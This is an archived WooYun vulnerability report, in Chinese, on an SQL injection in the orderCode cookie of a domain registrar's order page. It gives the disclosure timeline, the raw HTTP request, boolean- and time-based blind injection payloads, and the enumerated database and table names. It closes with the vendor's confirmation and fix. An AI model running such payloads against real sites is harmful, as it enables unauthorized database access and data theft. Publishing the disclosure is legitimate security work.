乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-05: 细节已通知厂商并且等待厂商处理中 2015-01-06: 厂商已经确认,细节仅向厂商公开 2015-01-16: 细节向核心白帽子及相关领域专家公开 2015-01-26: 细节向普通白帽子公开 2015-02-05: 细节向实习白帽子公开 2015-02-12: 厂商已经修复漏洞并主动公开,细节向公众公开
SQL注射可导致大量敏感信息泄漏
1.存在问题的功能如下;
2.获取的数据请求如下,存在注入的参数:orderCode;
POST http://www.sfn.cn/order HTTP/1.1Host: www.sfn.cnProxy-Connection: keep-aliveContent-Length: 37Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.sfn.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.sfn.cn/orderAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ko;q=0.2,ja;q=0.2,es;q=0.2Cookie: orderCode=150104154127207&payStatus=1
3.获取的数据库信息如下;
---Place: POSTParameter: orderCode Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderCode=150104154127207' AND 1077=1077 AND 'yENh' LIKE 'yENh&payStatus=1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: orderCode=150104154127207' AND SLEEP(5) AND 'dLyU' LIKE 'dLyU&payStatus=1---web application technology: Nginxback-end DBMS: MySQL 5.0.11available databases [2]:[*] information_schema[*] sanfront
4.进一步证明,获取的表信息如下;
Database: sanfront[78 tables]+----------------------------+| domain || user || zone || account || accountAdd || accountRemove || adminUser || agent_info || agent_price || borrow_account || borrow_account_detail || cart || city || contact || country || cp_tempList || cp_tempSort || district || dns_records || dns_rr || dns_zone || domainRRNum || domain_history || domain_redemption || domain_status || domain_transfer_in || domain_transfer_owner || email || general || general_transfer_in || host || hosting || invoice || job_employ_education || job_employ_family || job_employ_registration || job_employ_training || job_employ_work_experience || lookup || newsInfo || newsSort || orderDetail || orderInfo || original || password_apply || pollMessage || product || productEmail || productHosting || productPrice || productVPS || productVirtualHost || province || rechargeapply || resource || revenue || revenue_apply || role || role_task || rr || slides || task || task_resource || tempList || tempSort || trustedSite || trustedSiteDomain || trustedSiteMaterial || url_redirect || user_role || user_task || user_transfer || virtualHost || vps || websiting || websiting_history || wireless || wireless_transfer_in |+----------------------------+
见详细说明
过滤
危害等级:高
漏洞Rank:15
确认时间:2015-01-06 09:07
已收到漏洞报告,反馈给技术部门修复中
2015-02-12:该漏洞已修复